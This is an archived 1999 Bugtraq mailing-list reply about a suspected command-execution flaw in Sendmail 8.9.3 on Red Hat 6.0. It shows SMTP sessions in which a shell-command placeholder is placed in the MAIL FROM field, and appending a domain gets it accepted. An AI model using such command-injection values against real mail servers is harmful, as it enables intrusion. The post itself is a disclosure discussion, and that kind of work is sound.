[12199] in bugtraq


Re: RH6.0 local/remote command execution

daemon@ATHENA.MIT.EDU (drago@JUNKER.ORG)
Sat Oct 9 15:38:08 1999

Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id:  <Pine.LNX.4.10.9910081731560.4155-100000@Junker.org>
Date:         Fri, 8 Oct 1999 17:33:05 -0400
Reply-To: D <drago@JUNKER.ORG>
From: D <drago@JUNKER.ORG>
X-To:         Neezam Haniff <nhaniff@WWW.RCC.RYERSON.CA>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <199910061749.NAA01688@www.rcc.ryerson.ca>

On Wed, 6 Oct 1999, Neezam Haniff wrote:

NH> [nhaniff@dhcp-160-190 nhaniff]$ telnet localhost 25
NH> Trying 127.0.0.1...
NH> Connected to localhost.
NH> Escape character is '^]'.
NH> 220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999 13:31:55 -0400
NH> helo x.x
NH> 250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost [127.0.0.1], pleased to meet you
NH> MAIL FROM: ;/command/to/execute;
NH> 553 ;/command/to/execute;... Domain name required

Let's get creative then............

MAIL FROM: ;/command/to/execute;
553 ;/command/to/execute;... Domain name required
MAIL FROM: ;/command/to/execute;@microsoft.com
250 ;/command/to/execute;@microsoft.com... Sender ok
